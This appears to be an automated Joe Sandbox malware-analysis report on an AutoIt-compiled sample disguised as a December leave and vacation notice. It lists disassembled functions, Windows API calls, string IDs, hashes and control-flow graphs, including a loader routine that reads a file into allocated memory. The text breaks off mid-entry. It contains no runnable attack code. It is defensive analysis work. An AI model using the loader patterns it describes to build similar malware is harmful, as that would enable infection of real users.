                                                      • __lseeki64_nolock.LIBCMT ref: 00FB607E
                                                      • __lseeki64_nolock.LIBCMT ref: 00FB6176
                                                      • __lseeki64_nolock.LIBCMT ref: 00FB618B
                                                      • __close_nolock.LIBCMT ref: 00FB61EB
                                                        • Part of subcall function 00FAEA9C: CloseHandle.KERNELBASE(00000000,0102EEF4,00000000,?,00FB6041,0102EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00FAEAEC
                                                        • Part of subcall function 00FAEA9C: GetLastError.KERNEL32(?,00FB6041,0102EEF4,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00FAEAF6
                                                        • Part of subcall function 00FAEA9C: __free_osfhnd.LIBCMT ref: 00FAEB03
                                                        • Part of subcall function 00FAEA9C: __dosmaperr.LIBCMT ref: 00FAEB25
                                                        • Part of subcall function 00FA7C0E: __getptd_noexit.LIBCMT ref: 00FA7C0E
                                                      • __lseeki64_nolock.LIBCMT ref: 00FB620D
                                                      • CloseHandle.KERNEL32(00000000,?,?,?,?,?,00000000,00000109), ref: 00FB6342
                                                      • ___createFile.LIBCMT ref: 00FB6361
                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000109), ref: 00FB636E
                                                      • __dosmaperr.LIBCMT ref: 00FB6375
                                                      • __free_osfhnd.LIBCMT ref: 00FB6395
                                                      • __invoke_watson.LIBCMT ref: 00FB63C3
                                                      • __wsopen_helper.LIBCMT ref: 00FB63DD
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: __lseeki64_nolock$ErrorFileLast__dosmaperr$CloseHandle___create$__close_nolock__free_osfhnd$Type__chsize_nolock__getptd_noexit__invoke_watson__set_osfhnd__wsopen_helper
                                                      • String ID: @
                                                      • API String ID: 3896587723-2766056989
                                                      • Opcode ID: 5a0d85496aad26145457921d0aa33142ee0562ed40cb35f67efd96be0820c179
                                                      • Instruction ID: c236f009df95340f82b340973e3ff05d1128a63e00aa5e8fab8e817c4ab31fca
                                                      • Opcode Fuzzy Hash: 5a0d85496aad26145457921d0aa33142ee0562ed40cb35f67efd96be0820c179
                                                      • Instruction Fuzzy Hash: 6D2213B1D0460A9BEF299E6ADC85BFD7B61EB05724F284228E521DB2D1C33D8D40EF51
                                                      Function 00FCFA0C Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 238COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • _wcscpy.LIBCMT ref: 00FCFA96
                                                      • _wcschr.LIBCMT ref: 00FCFAA4
                                                      • _wcscpy.LIBCMT ref: 00FCFABB
                                                      • _wcscat.LIBCMT ref: 00FCFACA
                                                      • _wcscat.LIBCMT ref: 00FCFAE8
                                                      • _wcscpy.LIBCMT ref: 00FCFB09
                                                      • __wsplitpath.LIBCMT ref: 00FCFBE6
                                                      • _wcscpy.LIBCMT ref: 00FCFC0B
                                                      • _wcscpy.LIBCMT ref: 00FCFC1D
                                                      • _wcscpy.LIBCMT ref: 00FCFC32
                                                      • _wcscat.LIBCMT ref: 00FCFC47
                                                      • _wcscat.LIBCMT ref: 00FCFC59
                                                      • _wcscat.LIBCMT ref: 00FCFC6E
                                                        • Part of subcall function 00FCBFA4: _wcscmp.LIBCMT ref: 00FCC03E
                                                        • Part of subcall function 00FCBFA4: __wsplitpath.LIBCMT ref: 00FCC083
                                                        • Part of subcall function 00FCBFA4: _wcscpy.LIBCMT ref: 00FCC096
                                                        • Part of subcall function 00FCBFA4: _wcscat.LIBCMT ref: 00FCC0A9
                                                        • Part of subcall function 00FCBFA4: __wsplitpath.LIBCMT ref: 00FCC0CE
                                                        • Part of subcall function 00FCBFA4: _wcscat.LIBCMT ref: 00FCC0E4
                                                        • Part of subcall function 00FCBFA4: _wcscat.LIBCMT ref: 00FCC0F7
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: _wcscat$_wcscpy$__wsplitpath$_wcschr_wcscmp
                                                      • String ID: >>>AUTOIT SCRIPT<<<
                                                      • API String ID: 2955681530-2806939583
                                                      • Opcode ID: 77eec82ebe525ae28b72e0a1baf3e660ca97b62b84bbb8d9da0935720b75a24e
                                                      • Instruction ID: 8952c2f14831863ae5fbd63c8104da7252a996c59fed52a8aaab07f4649205ad
                                                      • Opcode Fuzzy Hash: 77eec82ebe525ae28b72e0a1baf3e660ca97b62b84bbb8d9da0935720b75a24e
                                                      • Instruction Fuzzy Hash: 6991B472504306AFDB10EB54CD52F9AB3E9BF84310F04482DF99997291DB38FA48EB91
                                                      Function 00F83F53 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F83F86
                                                      • RegisterClassExW.USER32(00000030), ref: 00F83FB0
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F83FC1
                                                      • InitCommonControlsEx.COMCTL32(?), ref: 00F83FDE
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F83FEE
                                                      • LoadIconW.USER32(000000A9), ref: 00F84004
                                                      • ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F84013
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
                                                      • String ID: +$0$AutoIt v3 GUI$TaskbarCreated
                                                      • API String ID: 2914291525-1005189915
                                                      • Opcode ID: e03449933ea24f55255d64c815b00e3777b020bea6e32d4c642cb1df63fd96cc
                                                      • Instruction ID: c54d66d093a40185a68556bdc5da24147111ae73767fdadb218bd6e9a4a93c15
                                                      • Opcode Fuzzy Hash: e03449933ea24f55255d64c815b00e3777b020bea6e32d4c642cb1df63fd96cc
                                                      • Instruction Fuzzy Hash: 5621C9B9900318AFDB21DFE4E989BCDBBB4FB08704F00411AF595A6284D7BA55848FA1
                                                      Function 00FCBFA4 Relevance: 18.3, APIs: 12, Instructions: 316fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                        • Part of subcall function 00FCBDB4: __time64.LIBCMT ref: 00FCBDBE
                                                        • Part of subcall function 00F84517: _fseek.LIBCMT ref: 00F8452F
                                                      • __wsplitpath.LIBCMT ref: 00FCC083
                                                        • Part of subcall function 00FA1DFC: __wsplitpath_helper.LIBCMT ref: 00FA1E3C
                                                      • _wcscpy.LIBCMT ref: 00FCC096
                                                      • _wcscat.LIBCMT ref: 00FCC0A9
                                                      • __wsplitpath.LIBCMT ref: 00FCC0CE
                                                      • _wcscat.LIBCMT ref: 00FCC0E4
                                                      • _wcscat.LIBCMT ref: 00FCC0F7
                                                      • _wcscmp.LIBCMT ref: 00FCC03E
                                                        • Part of subcall function 00FCC56D: _wcscmp.LIBCMT ref: 00FCC65D
                                                        • Part of subcall function 00FCC56D: _wcscmp.LIBCMT ref: 00FCC670
                                                      • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 00FCC2A1
                                                      • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FCC338
                                                      • CopyFileW.KERNELBASE(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 00FCC34E
                                                      • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FCC35F
                                                      • DeleteFileW.KERNELBASE(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 00FCC371
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                      • String ID:
                                                      • API String ID: 2378138488-0
                                                      • Opcode ID: dcb3f3e91483a015ed9ea7c87a11b954c9cdc1260f7775a112cbac212de8fce1
                                                      • Instruction ID: 02b570936d740955bd859d3db51cff511b8398de19c85c0d535c1b130044a6e8
                                                      • Opcode Fuzzy Hash: dcb3f3e91483a015ed9ea7c87a11b954c9cdc1260f7775a112cbac212de8fce1
                                                      • Instruction Fuzzy Hash: 0FC129B1D0021AAADF21DF95CD82FDEB7BDAF49310F0040AAF609E6151DB359A849F61
                                                      Function 00F83742 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 957 f83742-f83762 959 f837c2-f837c4 957->959 960 f83764-f83767 957->960 959->960 963 f837c6 959->963 961 f837c8 960->961 962 f83769-f83770 960->962 967 f837ce-f837d1 961->967 968 ff1e00-ff1e2e call f82ff6 call f9e312 961->968 964 f8382c-f83834 PostQuitMessage 962->964 965 f83776-f8377b 962->965 966 f837ab-f837b3 DefWindowProcW 963->966 972 f837f2-f837f4 964->972 970 ff1e88-ff1e9c call fc4ddd 965->970 971 f83781-f83783 965->971 973 f837b9-f837bf 966->973 974 f837d3-f837d4 967->974 975 f837f6-f8381d SetTimer RegisterWindowMessageW 967->975 1003 ff1e33-ff1e3a 968->1003 970->972 996 ff1ea2 970->996 979 f83789-f8378e 971->979 980 f83836-f83840 call f9eb83 971->980 972->973 976 f837da-f837ed KillTimer call f83847 call f8390f 974->976 977 ff1da3-ff1da6 974->977 975->972 981 f8381f-f8382a CreatePopupMenu 975->981 976->972 989 ff1ddc-ff1dfb MoveWindow 977->989 990 ff1da8-ff1daa 977->990 985 ff1e6d-ff1e74 979->985 986 f83794-f83799 979->986 997 f83845 980->997 981->972 985->966 992 ff1e7a-ff1e83 call fba5f3 985->992 994 ff1e58-ff1e68 call fc55bd 986->994 995 f8379f-f837a5 986->995 989->972 998 ff1dac-ff1daf 990->998 999 ff1dcb-ff1dd7 SetFocus 990->999 992->966 994->972 995->966 995->1003 996->966 997->972 998->995 1004 ff1db5-ff1dc6 call f82ff6 998->1004 999->972 1003->966 1007 ff1e40-ff1e53 call f83847 call f84ffc 1003->1007 1004->972 1007->966
                                                      APIs
                                                      • DefWindowProcW.USER32(?,?,?,?), ref: 00F837B3
                                                      • KillTimer.USER32(?,00000001), ref: 00F837DD
                                                      • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00F83800
                                                      • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F8380B
                                                      • CreatePopupMenu.USER32 ref: 00F8381F
                                                      • PostQuitMessage.USER32(00000000), ref: 00F8382E
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                      • String ID: TaskbarCreated
                                                      • API String ID: 129472671-2362178303
                                                      • Opcode ID: cfe1ef69035823d3e69aac93fbf157b4c2b633d96eadf9e49fa9886c7ce29c12
                                                      • Instruction ID: 2df640bf868ff8bbe9710b0fb315484bfa1c91f11b0d10a343c630006a094cf4
                                                      • Opcode Fuzzy Hash: cfe1ef69035823d3e69aac93fbf157b4c2b633d96eadf9e49fa9886c7ce29c12
                                                      • Instruction Fuzzy Hash: 14415EF660814997DB24BF68ED8ABFD3665FB04B10F000115F641921A1DB7DED40B761
                                                      Function 00F83E6E Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 66windowregistryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • GetSysColorBrush.USER32(0000000F), ref: 00F83E79
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 00F83E88
                                                      • LoadIconW.USER32(00000063), ref: 00F83E9E
                                                      • LoadIconW.USER32(000000A4), ref: 00F83EB0
                                                      • LoadIconW.USER32(000000A2), ref: 00F83EC2
                                                        • Part of subcall function 00F84024: LoadImageW.USER32(00F80000,00000063,00000001,00000010,00000010,00000000), ref: 00F84048
                                                      • RegisterClassExW.USER32(?), ref: 00F83F30
                                                        • Part of subcall function 00F83F53: GetSysColorBrush.USER32(0000000F), ref: 00F83F86
                                                        • Part of subcall function 00F83F53: RegisterClassExW.USER32(00000030), ref: 00F83FB0
                                                        • Part of subcall function 00F83F53: RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00F83FC1
                                                        • Part of subcall function 00F83F53: InitCommonControlsEx.COMCTL32(?), ref: 00F83FDE
                                                        • Part of subcall function 00F83F53: ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00F83FEE
                                                        • Part of subcall function 00F83F53: LoadIconW.USER32(000000A9), ref: 00F84004
                                                        • Part of subcall function 00F83F53: ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 00F84013
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                      • String ID: #$0$AutoIt v3
                                                      • API String ID: 423443420-4155596026
                                                      • Opcode ID: 42f11738a85d480aca6c94e48ef31f3f444a824a3e053534e1bf2bd85d6815a9
                                                      • Instruction ID: fcc4c109fe25f5277f2341fbff3f90b0cebf1f6887417158a5a02764f33f197f
                                                      • Opcode Fuzzy Hash: 42f11738a85d480aca6c94e48ef31f3f444a824a3e053534e1bf2bd85d6815a9
                                                      • Instruction Fuzzy Hash: A62177F8E04354AFCB21DFE9E985A99BFF5FB48710F00411AE244A32A4D37A6544CF91
                                                      Function 01A4C3D0 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1021 1a4c3d0-1a4c47e call 1a49de0 1024 1a4c485-1a4c4ab call 1a4d2e0 CreateFileW 1021->1024 1027 1a4c4b2-1a4c4c2 1024->1027 1028 1a4c4ad 1024->1028 1033 1a4c4c4 1027->1033 1034 1a4c4c9-1a4c4e3 VirtualAlloc 1027->1034 1029 1a4c5fd-1a4c601 1028->1029 1031 1a4c643-1a4c646 1029->1031 1032 1a4c603-1a4c607 1029->1032 1035 1a4c649-1a4c650 1031->1035 1036 1a4c613-1a4c617 1032->1036 1037 1a4c609-1a4c60c 1032->1037 1033->1029 1040 1a4c4e5 1034->1040 1041 1a4c4ea-1a4c501 ReadFile 1034->1041 1042 1a4c6a5-1a4c6ba 1035->1042 1043 1a4c652-1a4c65d 1035->1043 1038 1a4c627-1a4c62b 1036->1038 1039 1a4c619-1a4c623 1036->1039 1037->1036 1046 1a4c62d-1a4c637 1038->1046 1047 1a4c63b 1038->1047 1039->1038 1040->1029 1048 1a4c503 1041->1048 1049 1a4c508-1a4c548 VirtualAlloc 1041->1049 1044 1a4c6bc-1a4c6c7 VirtualFree 1042->1044 1045 1a4c6ca-1a4c6d2 1042->1045 1050 1a4c661-1a4c66d 1043->1050 1051 1a4c65f 1043->1051 1044->1045 1046->1047 1047->1031 1048->1029 1052 1a4c54f-1a4c56a call 1a4d530 1049->1052 1053 1a4c54a 1049->1053 1054 1a4c681-1a4c68d 1050->1054 1055 1a4c66f-1a4c67f 1050->1055 1051->1042 1061 1a4c575-1a4c57f 1052->1061 1053->1029 1056 1a4c68f-1a4c698 1054->1056 1057 1a4c69a-1a4c6a0 1054->1057 1059 1a4c6a3 1055->1059 1056->1059 1057->1059 1059->1035 1062 1a4c581-1a4c5b0 call 1a4d530 1061->1062 1063 1a4c5b2-1a4c5c6 call 1a4d340 1061->1063 1062->1061 1069 1a4c5c8 1063->1069 1070 1a4c5ca-1a4c5ce 1063->1070 1069->1029 1071 1a4c5d0-1a4c5d4 CloseHandle 1070->1071 1072 1a4c5da-1a4c5de 1070->1072 1071->1072 1073 1a4c5e0-1a4c5eb VirtualFree 1072->1073 1074 1a4c5ee-1a4c5f7 1072->1074 1073->1074 1074->1024 1074->1029
                                                      APIs
                                                      • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 01A4C4A1
                                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 01A4C6C7
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130782459.0000000001A49000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A49000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a49000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateFileFreeVirtual
                                                      • String ID:
                                                      • API String ID: 204039940-0
                                                      • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                      • Instruction ID: 95b37a755828a9d59744a82d4d5d4f6c959b6619f467942d18a64e940f172be5
                                                      • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                      • Instruction Fuzzy Hash: DCA13B70E01209EBDB14CFA8C994BEEBBB5FF88314F209159E105BB285D775AA40CF95
                                                      Function 00F849FB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73registryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1130 f849fb-f84a25 call f8bcce RegOpenKeyExW 1133 ff41cc-ff41e3 RegQueryValueExW 1130->1133 1134 f84a2b-f84a2f 1130->1134 1135 ff4246-ff424f RegCloseKey 1133->1135 1136 ff41e5-ff4222 call f9f4ea call f847b7 RegQueryValueExW 1133->1136 1141 ff423d-ff4245 call f847e2 1136->1141 1142 ff4224-ff423b call f86a63 1136->1142 1141->1135 1142->1141
                                                      APIs
                                                      • RegOpenKeyExW.KERNELBASE(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?), ref: 00F84A1D
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?), ref: 00FF41DB
                                                      • RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000), ref: 00FF421A
                                                      • RegCloseKey.ADVAPI32(?), ref: 00FF4249
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: QueryValue$CloseOpen
                                                      • String ID: Include$Software\AutoIt v3\AutoIt
                                                      • API String ID: 1586453840-614718249
                                                      • Opcode ID: 3a9458621b904b6f019852242c00f847da511d070bf6337280adc00bdfd2a45b
                                                      • Instruction ID: 50eb838321469fa49db2935fc4a307447ec62b450f262fe7b5315853994a4c9e
                                                      • Opcode Fuzzy Hash: 3a9458621b904b6f019852242c00f847da511d070bf6337280adc00bdfd2a45b
                                                      • Instruction Fuzzy Hash: F8116071A0010DBEEB15EBE4CD8AEFF7BACEF04354F004068B546D6151EA75AE01A760
                                                      Function 00F836B8 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1157 f836b8-f83728 CreateWindowExW * 2 ShowWindow * 2
                                                      APIs
                                                      • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00F836E6
                                                      • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00F83707
                                                      • ShowWindow.USER32(00000000,?,?,?,?,00F83AA3,?), ref: 00F8371B
                                                      • ShowWindow.USER32(00000000,?,?,?,?,00F83AA3,?), ref: 00F83724
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130341338.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                      • Associated: 00000000.00000002.2130324715.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000100D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130390961.000000000102E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130435624.000000000103A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.2130450660.0000000001044000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_f80000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: Window$CreateShow
                                                      • String ID: AutoIt v3$edit
                                                      • API String ID: 1584632944-3779509399
                                                      • Opcode ID: b459c7c46051a060964a594ec7cc2e29b9fa3d346b1130952de31011a9ebe24e
                                                      • Instruction ID: e40515e9e25362dd40389fd8c434dddd6fa2e2a283d877606c3eed285106e56a
                                                      • Opcode Fuzzy Hash: b459c7c46051a060964a594ec7cc2e29b9fa3d346b1130952de31011a9ebe24e
                                                      • Instruction Fuzzy Hash: 64F030B56802D07BD7315697AD4CE672E7DE7C6F20F00001FBA4892158C1BA2881CB70
                                                      Function 01A4C190 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 148fileCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 1262 1a4c190-1a4c2ca call 1a49de0 call 1a4c080 CreateFileW 1269 1a4c2d1-1a4c2e1 1262->1269 1270 1a4c2cc 1262->1270 1273 1a4c2e3 1269->1273 1274 1a4c2e8-1a4c302 VirtualAlloc 1269->1274 1271 1a4c381-1a4c386 1270->1271 1273->1271 1275 1a4c304 1274->1275 1276 1a4c306-1a4c31d ReadFile 1274->1276 1275->1271 1277 1a4c321-1a4c35b call 1a4c0c0 call 1a4b080 1276->1277 1278 1a4c31f 1276->1278 1283 1a4c377-1a4c37f ExitProcess 1277->1283 1284 1a4c35d-1a4c372 call 1a4c110 1277->1284 1278->1271 1283->1271 1284->1283
                                                      APIs
                                                        • Part of subcall function 01A4C080: Sleep.KERNELBASE(000001F4), ref: 01A4C091
                                                      • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01A4C2C0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.2130782459.0000000001A49000.00000040.00000020.00020000.00000000.sdmp, Offset: 01A49000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_1a49000_Mandatory Notice for all December Leave and Vacation application.jbxd
                                                      Similarity
                                                      • API ID: CreateFileSleep
                                                      • String ID: 946KWMH74B9KA1NT8X8YXF
                                                      • API String ID: 2694422964-2880569617
                                                      • Opcode ID: d595a9908eef6d3b91b0ab6f25c7fdad2b59237345bb6b90d4b375b5e7c8e345
                                                      • Instruction ID: 295963f3cb1573bcc010b0a304db355c4baac4e0b113b7a7aab2943e1494a796
                                                      • Opcode Fuzzy Hash: d595a9908eef6d3b91b0ab6f25c7fdad2b59237345bb6b90d4b375b5e7c8e345
                                                      • Instruction Fuzzy Hash: FB518130D05288DBEF11DBF4C844BEEBBB9AF59314F044199E2487B2C1D6B91B45CBA5
                                                      Function 00F851AF Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
